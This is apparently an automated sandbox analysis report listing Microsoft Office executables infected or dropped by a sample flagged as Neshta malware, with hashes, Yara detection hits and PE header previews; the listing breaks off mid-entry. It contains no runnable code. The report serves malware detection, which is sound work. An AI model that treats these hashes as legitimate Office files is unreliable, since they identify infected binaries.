                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.201681837230837
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCpSsTITDBkt+ETGBaORneubkuJ:sr85C7IvibTCaOFeubks
                                                          MD5:D528E65D0A3CFF610803965BAB5D42EE
                                                          SHA1:A01448DD0C03BAF9B1E287BCB87A58450084BFFA
                                                          SHA-256:C82DAD16438E79EE2ABC34D1B405F09DE3844FDEF99F9115B58E7D1F7C90C4E9
                                                          SHA-512:4A0C3C8F49CE25A4D5D06359683DE444EDFC6B49E09323D10F675E5029D584135A80F89A04FE77CB58D4B9BC6522F7E2DC359FC8D6EB8A55F981AB4CC07B91F3
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.352529349012904
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCkb7zbeu8L16Ytx2XaRSX2qA4i:sr85Ckb7Heu8LSakmP
                                                          MD5:2249CAFC0B359EA41F137AB87DC151FA
                                                          SHA1:DABA42EFF4B9D3251E409CFD98A2BD3B9A672ED3
                                                          SHA-256:3478297533C741CBF62D8FA8F2D820089E3777EBFD6DCDAD50F8FBCF93FB6304
                                                          SHA-512:D0684A20BD7449D97323DBBE93467148F7E63DB79EC1BD3AC2E90D1350148EDF6F31E7BBEE1F32773D169CD04E1D11FEF03AE2E2C5637A89288FFB08C8115DB5
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.46773744909196
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCxvuAvYalUpgotzYIlHkHwt7//Qt:sr85CqaBotvHkHwK
                                                          MD5:F3279F5053B3112B5299C08136AE58E9
                                                          SHA1:5B4C8EA82DC1E296CB31EC7B439B8B6E52795995
                                                          SHA-256:1A1E7090747C3F600989939E12DA73BD2E85FFCAD10159E7AC52D374DA11874A
                                                          SHA-512:86A355429C9358EEC0FE6B95623DC26FE7879684CDDB6AEAE293276FC5D604CC37DE64FC520F0EE749A3F6A15E9D5FB53852F9B444A0B3DE1374077578A99564
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.4135504331115705
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCC+MHzv1nArfoWBgJCSTgHyyf:sr85CDuv1nqQ2zSESy
                                                          MD5:A937F48D8198AB59DF93A63E834C4AAF
                                                          SHA1:4DA8ED9F7A886A8437562470A199744DF6E88F24
                                                          SHA-256:CA2CA4A45AB550D894AA4B16919FF38ABB7784E532C327891DF71645AB845C6A
                                                          SHA-512:490CDFC2D7AAF7142889398D70DE668CCCD8D4A52AF7C5FA9D64540CE2740F09A481293F4DFFED1ECCED9827148313D2296CC9BFC9716A88814544930C9DE551
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.344917752925491
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCDt+pejhS5enb1o24/tmIY514oZFt4s:sr85CDt+pGQ5E1o24VmIYX4oZP4s
                                                          MD5:EA546BBE947027BA147DE2719F53D051
                                                          SHA1:38B150F5A8BE8E19B5D1F2824F8EDE784DE2C6E6
                                                          SHA-256:930F29A1D4152D23CB5F1E60693191F2865F56EA5474BF720BDC286D518CD9C1
                                                          SHA-512:D456962B5511F76AF309345C22FCB20EDB120CF4EC3388300FEE1864B13859C605C40B6E86357E698DACA5AED60F56B59DFF1655E3059A9065B9550A7A3C9E1E
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.464347380493513
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCSGNDd85lS8adLs4XK9OtiRk+7mLpNKahE:sr85C9NDS5lS8D0K8tMk+7ms
                                                          MD5:072EDD1A5D3A99C26EA9987890989B31
                                                          SHA1:6ECC5A3EBEB7EC6EEBBEF28CEB67079A92F57107
                                                          SHA-256:598CA2D9EB855C5D53C9C19374AFFAAE2E4A6A9C9EBF1F46D2B025B5BD8731B4
                                                          SHA-512:D11D018159148C9926450A3047B207484D1B31B80BB975B435D6E0FEB497F60625450273C1D834FFAD74C7C581A80224898FDCDC41BB9D3BD799E70AE8EF838E
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.4498443082331764
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCLddbrls2itD1NrBOTe5IfY2X36Be:sr85CjbO1OTqcX36Be
                                                          MD5:187B658322698CB74D48476EB2ECB171
                                                          SHA1:3C4371425F833F6C7643E09BEBA5762B67081611
                                                          SHA-256:7460BB6E5A2E43F3C737730FE5F9FC5E199072C61B870C07FF35207F333EE496
                                                          SHA-512:3013808486F1445457BC00B919AFDCC46297B3F167A876EE5F028D50456EBE582C05882D99A0E677531C9FD3796F574AD88AB48FBF394A124F425894F841D636
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.336782734218808
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCEbf/h1xmGzUiVZd0p813HmTJhM3:sr85CMfJ1xmzsHmTHM3
                                                          MD5:A3977FA0A7C20B05EC69FADE4F852D71
                                                          SHA1:FE2C747F4DA1C5C85C55EB755CA32D59B0B1EC43
                                                          SHA-256:1F3B9AB4F318C962967E9418DFEEBF251EF610A0ECE5570E166D84B6A730A932
                                                          SHA-512:CD8082F275380F4CD67BA08904C116E921C428D8D6BD8BF411A93B42CA9276332AB6E7F46EEC05C697662A98CC70841D12AD3EA6A3DE54EB575DE11BF2A0A1B2
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.531432224892055
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCN5Ss6w5T7tIc+9KLSifgpM5:sr85CrSsp+9KSM5
                                                          MD5:A651847108A83A8B2A3B75A66403B0DC
                                                          SHA1:EA7CFC3C984B676C322578E80DCD78DDA75E5A2C
                                                          SHA-256:A1616D454E5EE365285A3E03455CED1FD70D8EEB682D47A8379EB08CF801D325
                                                          SHA-512:0B97CD6F46A4660C27E99F140D07BA7F0F380E32062D5F9AF550C161E0191332EB27A196C5CAEFEB94A091CF9294FFEE91604D0FEF329260F768D9669591E2CE
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):5.556968630457308
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCVFFlJhOo/ovdHk4h6zeXVv:sr85CVFFlJhOoGt66F
                                                          MD5:FB0697C512E65305CF24EFA18EC58086
                                                          SHA1:B924F5AFE1A14163E20DB2CDCE980017C1461D1E
                                                          SHA-256:CCA73F1C0206BBB9D6567616808D4BADAFAB7796ED40FC86097032802F2381D3
                                                          SHA-512:FA3AD9699129E24AEAC778B38EF1B6CEBA11B226E6636635224FCB9019036D9E11726F11F50A9D1D531A8A6F08B5D3A3B650E7416655113284B63412C01B1F60
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):5.131108501135707
                                                          Encrypted:false
                                                          SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJaFFlJhl7XC0dHPgzh263DX:JxqjQ+P04wsmJCVFFlJhlLDHmdzX
                                                          MD5:2DCEF042EE374AC5BA2307EE6D97FFAE
                                                          SHA1:3E39AD4F60367BAFB47B3759253064F7BA57A92B
                                                          SHA-256:C83153D11C1D63FF5C330035DD66A958BF19EC465969D82DE87351A2C5F7A99D
                                                          SHA-512:9319A16EA4B3D49FC1CFC4FE9E5890E2DDAA3E5D1523A150C77E0201C727EA0580E0B2D79CD4914968305B037B987494D57604E4792790069E992EEEE3D5324B
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.254281392784178
                                                          Encrypted:false
                                                          SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJrBE27rCNzU3GLCAAhUSCr1HkueFNUx+:JxqjQ+P04wsmJCKEJzbmAoDucEMQnF0
                                                          MD5:D7BF211CED7D30A27312CE4DA2487EE1
                                                          SHA1:CE664FBA8F5BEAA728CB7EAE107C5ED3810A5DDF
                                                          SHA-256:9266432725D9466253A4F1F609C9A2DD85FC82B3A0E3A6C43FCB1A267C976265
                                                          SHA-512:260EA864A9512B243DD18EC3C4D6CA7782DD3ED117AA553E6C30F3249655EEDB3768AC190432CBA66078F93C83F8B05CAB352B254FB58C3586EF56F2C3482EED
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.369176164130001
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCmmgFboVWAfMOD9nwcP4McxAF+V2r9Q:sr85CmhFbG5n7vcxAwVIu
                                                          MD5:E883EB6C4D29614F1887EDF6A2412659
                                                          SHA1:33DAF7D41A5C6D4D8AB1C91160F775D9810E10F9
                                                          SHA-256:BE47F38C1D1A3806AD27867DF41BF62AFB77FADCAD4F00CF3B68FD469E1B2154
                                                          SHA-512:EF18F22EB51AE378651FD7421E56EC682BE64AED01D79FDC1E3366459690AE52E312B4BE3A70C50653EC98C261EE2557C4B4F908AC8254E47B96F7268847F665
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):5.694866680260046
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJC5wI4PqxgWvwG+TUawK:sr85C5wslwG+TUawK
                                                          MD5:A851E7A4D035C32FCB2830718B34F01C
                                                          SHA1:6D89FD230ADE8F14971A600591A8B6FAF67CD770
                                                          SHA-256:73610C44EE38B1785E018C2BC869052729D56C65545F52EE5D2AB89C8C7B6DCE
                                                          SHA-512:77726930C4BFE2DF33FCADA1A4A493F8DB8B3A5681C5D79DC51F9625C4110680DFA50C44CA272B71E46175FF56954B1583B9771B73412D25D06954AF8AAF81E8
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.511827025814232
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCHz6xccTu/YnwN9+ko47VGsKkfrwayHd+f:sr85CT6yHYn+o4Jrn
                                                          MD5:2DBF9767B1524319753ADE899740500C
                                                          SHA1:D684A9E8CC28A5185CF477554DF2065D73126877
                                                          SHA-256:14143B435D60E49B251E80E37857E98D36088EB0CBE02C4C630F381E37BA8F0B
                                                          SHA-512:A7B9EA44485796E0AA8C51A2A762EA95640EE34FEA51C3F043A5EC37E99EE95054F610C8FB72C445609F90B6EBFA5590036294B8E4770BD483E8926B38C7BDB3
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.361986604416892
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJC4QTS8CYtvYSi+GAqeqCifxUajaQ:sr85C42S8/caAUSaQ
                                                          MD5:8F8291D79A298A9B071864C651BB0794
                                                          SHA1:F7614B1E0D476F1CBC75B5D698711F9DF460F773
                                                          SHA-256:E9562B1B83495930753D145E9834CCA9128745E3163C060A4AA3D7DA62AA468F
                                                          SHA-512:160D10672400D32BB10A059CC2AF3CA79810A9D0FDB88B79F6E0BB208DA26F973965853A429A7D9D4CD30570E015F17EB458DF6C6311BB89394AF46ED8B189E7
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):5.56237653560924
                                                          Encrypted:false
                                                          SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJ/MyzuDxqDq2m1eHwSFdrdAHZY:JxqjQ+P04wsmJCOxzuDxqDsmwSFbuY
                                                          MD5:2CF8F2ECEB42B70A5493D1EAEAC6B20A
                                                          SHA1:B411993C6352F4B026153AE4010A6C2D7B1ACE3B
                                                          SHA-256:A85EB54DE3BE548DBE89BC47098B417F4C1029BA084D0B15F75687D0751EF44E
                                                          SHA-512:8D2514F16C8D47CE668397B6DEF1A59A4D2C7B7E4A8E7613865C4833BE0B882D87AECB02C049B7496D633CA740DEB33A59DE6D0488F21C26109C89F8C511570D
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):5.388189611386593
                                                          Encrypted:false
                                                          SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJ/jWSlFQQoUmydAHZk6:JxqjQ+P04wsmJCOjTlWFauk6
                                                          MD5:62A21A597FA5F5C489D266A87694FE61
                                                          SHA1:8A9C326ABA5638F6B91BA8DD18D258998CC9D25B
                                                          SHA-256:D35B0D2411B6D5CDE4F61E5EBD70BBB1644AAE5E95EF417E3E885B20C194DE49
                                                          SHA-512:F4F9F7C8BDCDC7CAC1D491E528E88464A78F6254F44F2C3758860B495E188B607EA2FB2B292CCD82829F1E462EC07BFDD5F0F1729F7083C9FA398FD7EC133E26
                                                          Malicious:true
                                                          Yara Hits:
